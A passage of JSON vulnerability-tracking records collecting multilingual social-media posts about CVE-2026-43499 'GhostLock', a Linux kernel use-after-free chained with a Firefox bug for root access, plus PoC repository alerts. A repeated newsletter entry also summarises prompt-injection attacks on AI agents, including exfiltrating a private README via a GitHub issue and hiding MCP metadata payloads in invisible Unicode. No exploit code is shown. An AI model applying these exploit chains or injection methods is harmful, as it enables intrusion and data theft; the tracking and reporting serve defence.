\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u044f\u0434\u0440\u043e \u043e\u0447\u0438\u0449\u0430\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u0434\u043b\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u0434\u0430\u0447\u0438 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u00ab\u0432\u0438\u0441\u044f\u0447\u0438\u0439\u00bb \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442.\n\nNebula Security \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0438\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u0430\u043a RANDOMIZE_KSTACK_OFFSET, \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043d\u0438\u0436\u0430\u0435\u0442 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0435\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0445\u043e\u0442\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u044f\u0434\u0440\u0430 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c Linux \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u0438\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u043c, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u0442\u0430\u043d\u0443\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 GhostLock \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0432 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2026-07-14T00:00:46.086194Z"}, {"uuid": "882294f9-860b-4a67-843d-a6460b83fcd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/90796", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MobiusM\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-27 05:05:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 PoC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-14T00:00:34.393791Z"}, {"uuid": "d3968d53-d81c-4fec-9e62-892ffa0d38f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/poxek/6234", "content": "IonStack: root Android 17 \u0441 \u043e\u0434\u043d\u043e\u0433\u043e URL\n\nNebula Security \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0430 IonStack \u2014 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u0443\u044e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044e \u0446\u0435\u043f\u043e\u0447\u043a\u0438 Firefox \u2192 Linux kernel, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430 Android 17 \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0432\u0435\u0441\u0442\u0438 \u043e\u0434\u0438\u043d \u043a\u043b\u0438\u043a \u043f\u043e URL \u0434\u043e root-\u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u0412 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2026-10702, JIT miscompilation \u0432 JavaScript Engine Firefox, \u0437\u0430\u043a\u0440\u044b\u0442\u0430\u044f \u0432 Firefox 151.0.3, \u0438 CVE-2026-43499 GhostLock \u2014 use-after-free \u0432 rtmutex/futex-PI \u043a\u043e\u0434\u0435 \u044f\u0434\u0440\u0430 Linux.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438 \u044d\u0442\u043e browser-to-kernel full chain. \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0431\u0430\u0433 \u0432 Firefox \u0434\u0430\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u0437\u0430\u0442\u0435\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f kernel LPE \u043f\u0440\u043e\u0431\u0438\u0432\u0430\u0435\u0442 \u0438\u0437\u043e\u043b\u044f\u0446\u0438\u044e \u0438 \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438. \u0423 GhostLock \u043c\u0435\u0445\u0430\u043d\u0438\u043a\u0430: \u043e\u0431\u044b\u0447\u043d\u044b\u0435 threading/futex syscalls \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0432\u0438\u0441\u044f\u0447\u0438\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0441\u0442\u0435\u043a \u044f\u0434\u0440\u0430; \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Nebula, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d \u2014 Linux 2.6.39-rc1 \u0434\u043e 7.1-rc1 \u043f\u0440\u0438 CONFIG_FUTEX_PI=y, \u0430 \u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432 kernelCTF \u0431\u044b\u043b\u0430 \u043e\u043a\u043e\u043b\u043e 97% \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0439.\n\n\u0412\u0430\u0436\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435: \u044d\u0442\u043e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0435 \u0434\u0435\u043c\u043e \u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 PoC, \u0430 \u043d\u0435 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. Android-\u0447\u0430\u0441\u0442\u044c \u0437\u0430\u0432\u0438\u0441\u0438\u0442 \u043e\u0442 Firefox/Fenix \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u044f\u0434\u0440\u0430 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435; \u043d\u0430 \u0434\u0435\u043c\u043e-\u0441\u0430\u0439\u0442\u0435 Nebula \u043f\u0440\u044f\u043c\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0445 \u043f\u0430\u0434\u0435\u043d\u0438\u044f\u0445, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0438 \u043f\u043e\u0442\u0435\u0440\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\ud83d\udc31  GitHub PoC\n\n\ud83c\udf1a @poxek | \ud83c\udf1a @poxek_ai | \ud83d\udcf2 MAX", "creation_timestamp": "2026-07-14T00:00:48.206462Z"}, {"uuid": "2bd0e422-92e4-433b-a55a-a1c12a16da9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mqlornb55u24", "content": "Top 3 CVE for last 7 days:\nCVE-2026-53359: 26 interactions\nCVE-2026-43499: 25 interactions\nCVE-2026-20262: 13 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-56291: 6 interactions\nCVE-2026-48907: 5 interactions\nCVE-2026-57830: 3 interactions\n", "creation_timestamp": "2026-07-14T07:30:43.292161Z"}, {"uuid": "0c7f9d0d-b23c-4700-87c3-73dbadc63ffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/bhhub/1203", "content": "Weekly 8 AI &amp; Cyber signals to act on (Jul 11\u201313, 2026)\n\n#AISecurity@bhhub\n\n\u2728 GitLost turns a public GitHub issue into private-repo exfiltration\nNoma reproduced an unauthenticated prompt injection against a GitHub Agentic Workflow with cross-repository read access: the agent fetched a private README and posted it into a public issue. The PoC is configuration-dependent, but the control is clear\u2014untrusted issue text, broad agent permissions, and public write-back must not share one trust boundary.\n\n\u2728 Invisible Unicode defeats MCP\u2019s one-time approval view\nA real-protocol study tested eight metadata payloads across three MCP server libraries. All eight reached model context, none triggered re-approval, and Unicode TAG characters alone stayed invisible to the reviewer; all 32 cross-library cells agreed. The authors released a harness and fail-closed verifier, though independent replication is pending.\n\n\u2728 Update: Langflow cross-tenant flow execution is now in CISA KEV\nCISA added CVE-2026-55255 to KEV on July 7 after evidence of active exploitation. The authenticated IDOR lets an attacker execute another user\u2019s flow by supplying its ID; GitHub scores it 9.9 and Langflow fixed it in 1.9.1. This is a new exploitation-status event, not a replay of the June disclosure.\n\n#AppSec@bhhub\n\n\u2728 GhostLock turns a 15-year Linux stack UAF into root\nNebula Security published a kernelCTF exploit for CVE-2026-43499: regular futex PI syscalls create a dangling stack pointer, then a control-flow pivot yields privilege escalation or container escape. The researchers report 97% reliability and a $92,337 reward; unpatched kernels carrying the affected path need the upstream fix.\n\n\u2728 Browser wallets leak links between addresses, sites, and identities\nA PoPETs-accepted measurement of 85 Chrome wallets representing 35.16 million users formalizes five privacy threats. Routine RPC calls linked addresses, most Ethereum wallets kept exposing revoked addresses, and provider injection into cross-origin iframes enabled passive cross-site tracking\u2014evidence that wallet privacy needs protocol-level, not merely UI-level, controls.\n\n\u2728 SolSmith found 25 Solidity compiler miscompilations\nThree years of semantics-aware differential fuzzing uncovered 25 previously missed compiler bugs, some latent for years, then classified their root causes and user impact. Because immutable smart-contract behavior depends on compiler correctness, the result argues for continuously testing optimization passes with valid, adversarially generated programs; the paper does not quantify deployed-contract exposure.\n\n#RedTeam@bhhub\n\n\u2728 Bit2Watt weaponizes legal GPU workloads against power infrastructure\nThe CHES 2026 paper validates workload-driven power modulation with analysis, simulations, GPUs, and a grid-connected PV inverter. In its synchronized worst-case model, 1,000 GPUs on a 1-MW, 90%-DER system drove current THD to 46.8% and damping to \u22120.27; those grid-scale effects are simulated, but expose a cross-layer tenant threat normal telemetry may miss.\n\n#BlueTeam@bhhub\n\n\u2728 Internet-wide scans expose healthcare\u2019s plaintext attack surface\nThe Euro S&amp;P study scanned DICOM, HL7, and FHIR across IPv4 and IPv6 and ran a nine-month honeypot. It found 2,841 services with authentication flaws, 94.4% of exposed endpoints without transport encryption, and 1,373 systems with known vulnerabilities up to CVSS 9.8, followed by coordinated disclosure\u2014clear priorities for segmentation, TLS, inventory, and remediation.", "creation_timestamp": "2026-07-14T12:00:04.785336Z"}, {"uuid": "e1f90485-4ce1-4f62-86c3-0b3a1b9a3101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/analytikdata.ch/post/3mqm7kchko42o", "content": "GhostLock (CVE-2026-43499): 15 Jahre alte Linux-Kernel-L\u00fccke \u2014 lokaler Root-Zugriff und Container-Ausbruch, \u00f6ffentlicher Exploit. Kernel patchen UND neu starten: Bei uns war ein Server gepatcht, aber nie gebootet. Erst der Reboot sch\u00fctzt. https://nebusec.ai/research/ionstack-part-2/", "creation_timestamp": "2026-07-14T12:30:51.483638Z"}, {"uuid": "d64db4df-179d-4a42-8509-09cbbf4a67c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/cant10.bsky.social/post/3mqmhjjqhos2k", "content": "VEGA, el agente de inteligencia artificial de Nebula Security, descubri\u00f3 GhostLock (CVE-2026-43499), una vulnerabilidad cr\u00edtica en el kernel de Linux que llevaba oculta 15 a\u00f1os, desde la versi\u00f3n 2.6.39 de 2011.", "creation_timestamp": "2026-07-14T14:53:37.303188Z"}, {"uuid": "ee9560b8-b20b-44dd-8bed-7cb524b92463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/xakep_ru/19684", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c GhostLock \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 2011 \u0433\u043e\u0434\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b Linux\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Nebula Security \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 GhostLock (CVE-2026-43499), \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0432 \u044f\u0434\u0440\u0435 Linux. \u042d\u0442\u043e\u0442 \u0431\u0430\u0433 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f root \u0438 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u0442\u044c \u043f\u043e\u0431\u0435\u0433 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0430 \u0432 \u043a\u043e\u0434\u0435 \u044f\u0434\u0440\u0430 \u0441 2011 \u0433\u043e\u0434\u0430 \u0438 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\nhttps://xakep.ru/2026/07/14/ghostlock/", "creation_timestamp": "2026-07-14T18:00:03.576045Z"}, {"uuid": "df44ac41-d3b6-4532-bb82-06db4bced07a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/xakep_ru/19684", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c GhostLock \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 2011 \u0433\u043e\u0434\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b Linux\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Nebula Security \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 GhostLock (CVE-2026-43499), \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0432 \u044f\u0434\u0440\u0435 Linux. \u042d\u0442\u043e\u0442 \u0431\u0430\u0433 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f root \u0438 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u0442\u044c \u043f\u043e\u0431\u0435\u0433 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0430 \u0432 \u043a\u043e\u0434\u0435 \u044f\u0434\u0440\u0430 \u0441 2011 \u0433\u043e\u0434\u0430 \u0438 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\nhttps://xakep.ru/2026/07/14/ghostlock/", "creation_timestamp": "2026-07-15T00:00:18.602745Z"}, {"uuid": "a8223540-b391-4206-999f-5e3f2720ca3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/90796", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MobiusM\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-27 05:05:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 PoC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-15T00:00:22.483653Z"}, {"uuid": "f1f48c00-8c8b-4f5f-9822-41fcd3e983cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/bhhub/1203", "content": "Weekly 8 AI &amp; Cyber signals to act on (Jul 11\u201313, 2026)\n\n#AISecurity@bhhub\n\n\u2728 GitLost turns a public GitHub issue into private-repo exfiltration\nNoma reproduced an unauthenticated prompt injection against a GitHub Agentic Workflow with cross-repository read access: the agent fetched a private README and posted it into a public issue. The PoC is configuration-dependent, but the control is clear\u2014untrusted issue text, broad agent permissions, and public write-back must not share one trust boundary.\n\n\u2728 Invisible Unicode defeats MCP\u2019s one-time approval view\nA real-protocol study tested eight metadata payloads across three MCP server libraries. All eight reached model context, none triggered re-approval, and Unicode TAG characters alone stayed invisible to the reviewer; all 32 cross-library cells agreed. The authors released a harness and fail-closed verifier, though independent replication is pending.\n\n\u2728 Update: Langflow cross-tenant flow execution is now in CISA KEV\nCISA added CVE-2026-55255 to KEV on July 7 after evidence of active exploitation. The authenticated IDOR lets an attacker execute another user\u2019s flow by supplying its ID; GitHub scores it 9.9 and Langflow fixed it in 1.9.1. This is a new exploitation-status event, not a replay of the June disclosure.\n\n#AppSec@bhhub\n\n\u2728 GhostLock turns a 15-year Linux stack UAF into root\nNebula Security published a kernelCTF exploit for CVE-2026-43499: regular futex PI syscalls create a dangling stack pointer, then a control-flow pivot yields privilege escalation or container escape. The researchers report 97% reliability and a $92,337 reward; unpatched kernels carrying the affected path need the upstream fix.\n\n\u2728 Browser wallets leak links between addresses, sites, and identities\nA PoPETs-accepted measurement of 85 Chrome wallets representing 35.16 million users formalizes five privacy threats. Routine RPC calls linked addresses, most Ethereum wallets kept exposing revoked addresses, and provider injection into cross-origin iframes enabled passive cross-site tracking\u2014evidence that wallet privacy needs protocol-level, not merely UI-level, controls.\n\n\u2728 SolSmith found 25 Solidity compiler miscompilations\nThree years of semantics-aware differential fuzzing uncovered 25 previously missed compiler bugs, some latent for years, then classified their root causes and user impact. Because immutable smart-contract behavior depends on compiler correctness, the result argues for continuously testing optimization passes with valid, adversarially generated programs; the paper does not quantify deployed-contract exposure.\n\n#RedTeam@bhhub\n\n\u2728 Bit2Watt weaponizes legal GPU workloads against power infrastructure\nThe CHES 2026 paper validates workload-driven power modulation with analysis, simulations, GPUs, and a grid-connected PV inverter. In its synchronized worst-case model, 1,000 GPUs on a 1-MW, 90%-DER system drove current THD to 46.8% and damping to \u22120.27; those grid-scale effects are simulated, but expose a cross-layer tenant threat normal telemetry may miss.\n\n#BlueTeam@bhhub\n\n\u2728 Internet-wide scans expose healthcare\u2019s plaintext attack surface\nThe Euro S&amp;P study scanned DICOM, HL7, and FHIR across IPv4 and IPv6 and ran a nine-month honeypot. It found 2,841 services with authentication flaws, 94.4% of exposed endpoints without transport encryption, and 1,373 systems with known vulnerabilities up to CVSS 9.8, followed by coordinated disclosure\u2014clear priorities for segmentation, TLS, inventory, and remediation.", "creation_timestamp": "2026-07-15T00:00:25.156600Z"}, {"uuid": "2d1c8f47-5b84-4678-ad0d-90ef5f899a04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/92587", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #\u6f0f\u6d1e\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-armv7\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a tc3650\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-09 00:41:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-15T00:00:33.321857Z"}, {"uuid": "1feb8c92-9a2c-49e9-8a9f-d77ef939e295", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/Cr3wALFZfb610mv1uphOTC6B9r8adn_Xd1An_hCUvMHm7w", "content": "", "creation_timestamp": "2026-07-15T00:00:37.009313Z"}, {"uuid": 